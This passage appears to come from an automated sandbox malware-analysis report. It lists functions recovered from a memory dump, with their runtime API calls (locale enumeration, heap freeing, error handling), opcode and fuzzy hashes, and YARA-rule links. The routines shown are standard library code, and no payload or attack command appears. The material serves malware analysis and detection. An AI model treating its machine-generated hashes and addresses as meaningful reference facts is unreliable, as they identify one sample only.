                                                                                                                                                    • Instruction Fuzzy Hash: 9FF0F672A44200EFE740EF98E842B8D7BF2EB05322F10511EF800DB2A0CB754945CF44
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065C067, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(0065BFC0,00000001,00000000,?,?,0065C846,-00000050,?,?,?,00000055,?,-00000050,?,?,00000000), ref: 0065C09E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2417226690-0
                                                                                                                                                    • Opcode ID: 1882796f9e24413673177dca956e785dddd5402e60a41057a6c7f6f79cc13622
                                                                                                                                                    • Instruction ID: 400e91cb4fad140b7e992f87a8f7bbc48d48608ddb305a27086d44f0376feea7
                                                                                                                                                    • Opcode Fuzzy Hash: 1882796f9e24413673177dca956e785dddd5402e60a41057a6c7f6f79cc13622
                                                                                                                                                    • Instruction Fuzzy Hash: F1F0E5363003059BCB149F35DC85AAA7F96EFC1765F064058EE058B691C6769847DB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00651EBC, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,0064DE4B,?,20001004,00000000,00000002,?,?,0064D1AC), ref: 00651EF0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                    • Opcode ID: c169462129e753065d7fddf8c9a0d2e87f719c81d2c08b8d7ae68d115e81ecc9
                                                                                                                                                    • Instruction ID: 7897f5a9bf3258645f599c728423f8a6beb575398bf655b65d6abc92c4635bc2
                                                                                                                                                    • Opcode Fuzzy Hash: c169462129e753065d7fddf8c9a0d2e87f719c81d2c08b8d7ae68d115e81ecc9
                                                                                                                                                    • Instruction Fuzzy Hash: AEE04F35540619BBCF222F60DC09FAF3E17EF45762F044114FE456A221CF718A22ABD4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00651599, Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnumSystemLocalesW.KERNEL32(Function_0003748C,00000001), ref: 006515B3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2099609381-0
                                                                                                                                                    • Opcode ID: b2292357c4ecf6d3439f5c64ba75079f2b6b2f9e4755c7028d3b69e714fda179
                                                                                                                                                    • Instruction ID: 83df19bda851720390e67b5733754b6039bdab8b134142e2120f1c70b8d8833d
                                                                                                                                                    • Opcode Fuzzy Hash: b2292357c4ecf6d3439f5c64ba75079f2b6b2f9e4755c7028d3b69e714fda179
                                                                                                                                                    • Instruction Fuzzy Hash: 3DD0A770080304BFDB409F20EC8E9053F97D341350F102119F9480B270DEB168C2CB88
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006B138F, Relevance: .1, Instructions: 76COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.487458396.00000000006B1000.00000040.00020000.sdmp, Offset: 006B1000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
                                                                                                                                                    • Instruction ID: aeb0c6f1c3db526d7e5d1c37b70f59a86ce7ff7ff3e13c231c0acb13c7373400
                                                                                                                                                    • Opcode Fuzzy Hash: 534bad554abf5525a9623d87ff003475e141d78cd7fec20d07915e716a1b90ba
                                                                                                                                                    • Instruction Fuzzy Hash: 2A11AFB3350100AFD754CE55DC91EE6B3DAEB9A3317698066EC08CB301E636EC82C7A0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00659F92, Relevance: .0, Instructions: 40COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 233865af70df2c05dc7303e63745cc6250f39fbe00f17b3cbaee293b3360815f
                                                                                                                                                    • Instruction ID: 360c52fcfc40cc51bb4c2641da2046b03cd071cbdd53f91a2ba830c7dd5dd805
                                                                                                                                                    • Opcode Fuzzy Hash: 233865af70df2c05dc7303e63745cc6250f39fbe00f17b3cbaee293b3360815f
                                                                                                                                                    • Instruction Fuzzy Hash: 90F09072654220DBCB269A5C9A09FD976EEE745B52F150456FA02DB390C2B0DE44C7E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00659DC9, Relevance: .0, Instructions: 38COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 179f6df4a9ab3d296bf2d7deb77bed35367538074abb16f21de14b1170bb0d39
                                                                                                                                                    • Instruction ID: bd8f583ca0e0c6283a8a9a353a91bbdd2567e59b8d353c1608080d8c3e079342
                                                                                                                                                    • Opcode Fuzzy Hash: 179f6df4a9ab3d296bf2d7deb77bed35367538074abb16f21de14b1170bb0d39
                                                                                                                                                    • Instruction Fuzzy Hash: CDF0BE72240201EFCB55CF6CD94AF9677EAEF46706F200468E906DB392C630DE89E760
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00659ED9, Relevance: .0, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 6faab42cd9fcedb4bb5408000016003c13921a87bcfbe709cceecc0032ae90a8
                                                                                                                                                    • Instruction ID: bcdbb5972ad310c6984376507063d83f8ecc5ba0cae36585f1d82af65cf36668
                                                                                                                                                    • Opcode Fuzzy Hash: 6faab42cd9fcedb4bb5408000016003c13921a87bcfbe709cceecc0032ae90a8
                                                                                                                                                    • Instruction Fuzzy Hash: 47F06571615334EBCB16CB4CD805B9AB7EDEB45B52F1150A6F901EB250D270DE44C7D4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00659F1D, Relevance: .0, Instructions: 29COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 90be1ca2e33f9ef724b87a3879082865cacf3c6c0ff433f8a3b9305d71344798
                                                                                                                                                    • Instruction ID: e909591f8044435bca716c610b985bcb26db2b016aad13bad3b443b91640d872
                                                                                                                                                    • Opcode Fuzzy Hash: 90be1ca2e33f9ef724b87a3879082865cacf3c6c0ff433f8a3b9305d71344798
                                                                                                                                                    • Instruction Fuzzy Hash: 6BF03072A21224DBCB16CB4CD805B8977EDEB45B55F114096F905D7251C7B0DE44C7D0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00659D43, Relevance: .0, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 66d1e773c84b8cd00454fb817175d3d94ddb7d8e5aca766f6ac68419e19f4234
                                                                                                                                                    • Instruction ID: a684531edc90ceb10aa0eec7710adc2a2d8f72449d15be1a43e9ab63483064db
                                                                                                                                                    • Opcode Fuzzy Hash: 66d1e773c84b8cd00454fb817175d3d94ddb7d8e5aca766f6ac68419e19f4234
                                                                                                                                                    • Instruction Fuzzy Hash: FCE06D35600248DFCB45CF59C554B4ABBFAEB48385F2051B8E805C7250D334DE44CB50
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00659D86, Relevance: .0, Instructions: 26COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: aa5a65597762acc1f8cd742286ca744c9d6acb6d90d1fe43ea0ac68eb355452a
                                                                                                                                                    • Instruction ID: 19680e6f2caa69858db6b402060b922a75f35120aa0a0ec6ebd22ebc55d19639
                                                                                                                                                    • Opcode Fuzzy Hash: aa5a65597762acc1f8cd742286ca744c9d6acb6d90d1fe43ea0ac68eb355452a
                                                                                                                                                    • Instruction Fuzzy Hash: 19E06535A10248EFCB45CF69C544E8ABBFAEB88349F2044A8E809C7651E734DE88CB10
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00659F61, Relevance: .0, Instructions: 22COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5a658995e33e5c6ea103652b8e40e9f4c2b8ab9ae597e673441ba442df2d8f7c
                                                                                                                                                    • Instruction ID: be62d8520a1e86f7ef01323c7483e10880abe4791a7c2663b4732bb0817ea575
                                                                                                                                                    • Opcode Fuzzy Hash: 5a658995e33e5c6ea103652b8e40e9f4c2b8ab9ae597e673441ba442df2d8f7c
                                                                                                                                                    • Instruction Fuzzy Hash: 32E08C32911228EBCB58DF89C94498AF3EDEB85B41F15409AB901D3200C270DE04CBE4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00659E24, Relevance: .0, Instructions: 18COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 29134237c0010b784aba2fdbcaf31b9347ac41b4b804e180e77644d2e2ef90ba
                                                                                                                                                    • Instruction ID: 093e79ade469e2f509731d18cd324fd386195a7edbc1f5484bf205983013ca63
                                                                                                                                                    • Opcode Fuzzy Hash: 29134237c0010b784aba2fdbcaf31b9347ac41b4b804e180e77644d2e2ef90ba
                                                                                                                                                    • Instruction Fuzzy Hash: CBE0E235501248EFCB44DFA8C549F8AB7F9EB48755F1148A8E809D7251D238EE84DA14
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065958A, Relevance: 25.9, APIs: 17, Instructions: 411COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3409252457-0
                                                                                                                                                    • Opcode ID: da6b7c740ccc37692321bfdbb543ec06c740dc77ba23143f1fcd6f75ed705754
                                                                                                                                                    • Instruction ID: 611c7d60cb42c02ec1917097efd8cc86fa3bea8f0ad3cdb794fb0ac44466fdcd
                                                                                                                                                    • Opcode Fuzzy Hash: da6b7c740ccc37692321bfdbb543ec06c740dc77ba23143f1fcd6f75ed705754
                                                                                                                                                    • Instruction Fuzzy Hash: 9ED10A71904305EFEB20AFB88882AADB7A7AF06311F14456EFD1197381E731D949CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00647300, Relevance: 22.9, APIs: 15, Instructions: 357COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$Info
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2509303402-0
                                                                                                                                                    • Opcode ID: d3996e18bd063e9abe82057b431c710b4062804bc8cbb4aeeb0ae77ff326072f
                                                                                                                                                    • Instruction ID: b7497c7baeb037fadfa237b47405af4cc05c4685c4ad827c960c70d15cd57c30
                                                                                                                                                    • Opcode Fuzzy Hash: d3996e18bd063e9abe82057b431c710b4062804bc8cbb4aeeb0ae77ff326072f
                                                                                                                                                    • Instruction Fuzzy Hash: FED18D719046499FDB21DFB8C881BEEBBF6BF09300F14416DE895A7382DB75A845CB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065B366, Relevance: 19.6, APIs: 13, Instructions: 113COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 0065B3AA
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A55B
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A56D
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A57F
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A591
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5A3
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5B5
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5C7
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5D9
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5EB
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A5FD
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A60F
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A621
                                                                                                                                                      • Part of subcall function 0065A53E: _free.LIBCMT ref: 0065A633
                                                                                                                                                    • _free.LIBCMT ref: 0065B39F
                                                                                                                                                      • Part of subcall function 00650CDF: HeapFree.KERNEL32(00000000,00000000,?,0064E5D9), ref: 00650CF5
                                                                                                                                                      • Part of subcall function 00650CDF: GetLastError.KERNEL32(?,?,0064E5D9), ref: 00650D07
                                                                                                                                                    • _free.LIBCMT ref: 0065B3C1
                                                                                                                                                    • _free.LIBCMT ref: 0065B3D6
                                                                                                                                                    • _free.LIBCMT ref: 0065B3E1
                                                                                                                                                    • _free.LIBCMT ref: 0065B403
                                                                                                                                                    • _free.LIBCMT ref: 0065B416
                                                                                                                                                    • _free.LIBCMT ref: 0065B424
                                                                                                                                                    • _free.LIBCMT ref: 0065B42F
                                                                                                                                                    • _free.LIBCMT ref: 0065B467
                                                                                                                                                    • _free.LIBCMT ref: 0065B46E
                                                                                                                                                    • _free.LIBCMT ref: 0065B48B
                                                                                                                                                    • _free.LIBCMT ref: 0065B4A3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                    • Opcode ID: 6b37ca464fb7584ff389523134854ab8788f359ed53a479d6b421e8658c3a459
                                                                                                                                                    • Instruction ID: 31ee88ea625b30e06ffa448752e201bc91e6239b8c54e4daac32ebc3b214b2ff
                                                                                                                                                    • Opcode Fuzzy Hash: 6b37ca464fb7584ff389523134854ab8788f359ed53a479d6b421e8658c3a459
                                                                                                                                                    • Instruction Fuzzy Hash: 53318132500741AFEB70AA79D946B9A73E7FF01352F10551EE884E7255DB70EC49C724
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 006507E9, Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 38dc9f35f037bf23748df1cb8b205481120ccb54b692fbe185308617138d8559
                                                                                                                                                    • Instruction ID: 8c137353dac94774b337ee3e78edc5e6b0210c9da48b7374457c09a75ba28c3e
                                                                                                                                                    • Opcode Fuzzy Hash: 38dc9f35f037bf23748df1cb8b205481120ccb54b692fbe185308617138d8559
                                                                                                                                                    • Instruction Fuzzy Hash: C4219A7694010CAFDB41EF94C882DDE7BBAFF08355F004169F915AB121EB31EA49DB84
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0064F557, Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 496COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __aulldvrm
                                                                                                                                                    • String ID: :$f$f$f$p$p$p
                                                                                                                                                    • API String ID: 1302938615-1434680307
                                                                                                                                                    • Opcode ID: 66a0a20a5a53b751cbe040998e974d70f42e7be17b856497f3965f381c9d3c61
                                                                                                                                                    • Instruction ID: 65f7bdcf5c3ec2fc227825e4d8bcaacd581bb17d49d51d194163537b8d613334
                                                                                                                                                    • Opcode Fuzzy Hash: 66a0a20a5a53b751cbe040998e974d70f42e7be17b856497f3965f381c9d3c61
                                                                                                                                                    • Instruction Fuzzy Hash: 2F02AE75E00219EADF20CFA5D4846EDBBB3FF05B14F6446BAD419BB280D7349E888B15
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00657BBB, Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 431COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free_strpbrk
                                                                                                                                                    • String ID: *?
                                                                                                                                                    • API String ID: 3300345361-2564092906
                                                                                                                                                    • Opcode ID: 3b7bce0c6228894d87f02c0b90c55eb72cdad3bfbb192536ea74d8b888809b18
                                                                                                                                                    • Instruction ID: c54a39845aba82b75ac316383b9f5b123cda1350f9d6361d2ebec8c7015a14a0
                                                                                                                                                    • Opcode Fuzzy Hash: 3b7bce0c6228894d87f02c0b90c55eb72cdad3bfbb192536ea74d8b888809b18
                                                                                                                                                    • Instruction Fuzzy Hash: 2CE12AB5E042199FCB14DFA8D8819EEFBF6EF48310F14816EE815E7340E671AE458B94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00666A99, Relevance: 13.8, APIs: 9, Instructions: 301COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cd30116a94c7567bd0c12736c04a692bff9d948ad034444e283d86cfecb2015e
                                                                                                                                                    • Instruction ID: ee6760f74ce00fa1b3386546e18c60152b58996d2557a042c3afb7cfd0aa2dca
                                                                                                                                                    • Opcode Fuzzy Hash: cd30116a94c7567bd0c12736c04a692bff9d948ad034444e283d86cfecb2015e
                                                                                                                                                    • Instruction Fuzzy Hash: 8CC1C1B4A08249AFDF21DF99E881BAD7FB3AF49300F144159F844A7392D7319D42CB65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065AA94, Relevance: 13.7, APIs: 9, Instructions: 200COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                    • Opcode ID: 0bb294ae55dfec913af7a3bbf4168abe62a65dee3546c804af3ebf42fa8838f1
                                                                                                                                                    • Instruction ID: 7e93337ca2297d38ad0b0cbeced52b7670720e331bcef6fc8cc0c86f7cb8585c
                                                                                                                                                    • Opcode Fuzzy Hash: 0bb294ae55dfec913af7a3bbf4168abe62a65dee3546c804af3ebf42fa8838f1
                                                                                                                                                    • Instruction Fuzzy Hash: 5461E4729003059FDB20DFA8C841BAAB7EAAF45311F24465DFD55EB281EB30AD49CB61
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0064DA41, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 285COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00650A7B: GetLastError.KERNEL32(?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650A80
                                                                                                                                                      • Part of subcall function 00650A7B: SetLastError.KERNEL32(00000000,006A9220,000000FF,?,?,?,00647281,?,?,0062A056,?,0061AF45), ref: 00650B1E
                                                                                                                                                    • _memcmp.LIBVCRUNTIME ref: 0064DCDA
                                                                                                                                                    • _free.LIBCMT ref: 0064DD4E
                                                                                                                                                    • _free.LIBCMT ref: 0064DD67
                                                                                                                                                    • _free.LIBCMT ref: 0064DDA5
                                                                                                                                                    • _free.LIBCMT ref: 0064DDAE
                                                                                                                                                    • _free.LIBCMT ref: 0064DDBA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorLast$_memcmp
                                                                                                                                                    • String ID: C
                                                                                                                                                    • API String ID: 4275183328-1037565863
                                                                                                                                                    • Opcode ID: 78900c554daf2b544f11a3b40633fb287f2dfbe47a7054d51b20e3cbd46248ee
                                                                                                                                                    • Instruction ID: 672769a1119b9fb1a231881337941da94ac54b0dc3e173916b5ba522bd1bc7c0
                                                                                                                                                    • Opcode Fuzzy Hash: 78900c554daf2b544f11a3b40633fb287f2dfbe47a7054d51b20e3cbd46248ee
                                                                                                                                                    • Instruction Fuzzy Hash: B6C12975E016199BDB24DF28C884AADB7B6FF49304F1045EEE909A7390D771AE90CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00632369, Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 73COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • UnDecorator::getArgumentList.LIBVCRUNTIME ref: 00632389
                                                                                                                                                      • Part of subcall function 00632273: Replicator::operator[].LIBVCRUNTIME ref: 006322DF
                                                                                                                                                      • Part of subcall function 00632273: DName::operator+=.LIBVCRUNTIME ref: 006322E7
                                                                                                                                                    • DName::operator+.LIBCMT ref: 006323E0
                                                                                                                                                    • DName::DName.LIBVCRUNTIME ref: 00632429
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>
                                                                                                                                                    • API String ID: 834187326-463753507
                                                                                                                                                    • Opcode ID: 272eff9c7a004a4f3e2b96ce28670843c6a5218ea62318fd686e86d4e7515959
                                                                                                                                                    • Instruction ID: df9c56bc67a405be2362147f3529e7121c99b458773ada135eb570d356f76f29
                                                                                                                                                    • Opcode Fuzzy Hash: 272eff9c7a004a4f3e2b96ce28670843c6a5218ea62318fd686e86d4e7515959
                                                                                                                                                    • Instruction Fuzzy Hash: 60218E7060420A9FDB14DF5CD861BAA3FE6EB0A358F006169E445DB363C738E945CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0065AFF1, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 0065ACDC: _free.LIBCMT ref: 0065AD01
                                                                                                                                                    • _free.LIBCMT ref: 0065B03F
                                                                                                                                                      • Part of subcall function 00650CDF: HeapFree.KERNEL32(00000000,00000000,?,0064E5D9), ref: 00650CF5
                                                                                                                                                      • Part of subcall function 00650CDF: GetLastError.KERNEL32(?,?,0064E5D9), ref: 00650D07
                                                                                                                                                    • _free.LIBCMT ref: 0065B04A
                                                                                                                                                    • _free.LIBCMT ref: 0065B055
                                                                                                                                                    • _free.LIBCMT ref: 0065B0A9
                                                                                                                                                    • _free.LIBCMT ref: 0065B0B4
                                                                                                                                                    • _free.LIBCMT ref: 0065B0BF
                                                                                                                                                    • _free.LIBCMT ref: 0065B0CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000010.00000002.486590436.000000000061A000.00000020.00020000.sdmp, Offset: 0061A000, based on PE: false
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                    • Opcode ID: 9791cb4a201bd81e0f8ea3ec39f59c9674df00ecdb44f6a8a8e1fa3abcf23121
                                                                                                                                                    • Instruction ID: 17ade88cc9cd133b6a7ff90e983bffebcea2e9358da912cea01b4e6702d3c22b
                                                                                                                                                    • Opcode Fuzzy Hash: 9791cb4a201bd81e0f8ea3ec39f59c9674df00ecdb44f6a8a8e1fa3abcf23121
                                                                                                                                                    • Instruction Fuzzy Hash: FB118132584B84AFE7A0B7B0CC07FCB779E6F01702F404A1CBA9966092DA74F90D9695
                                                                                                                                                    Uniqueness

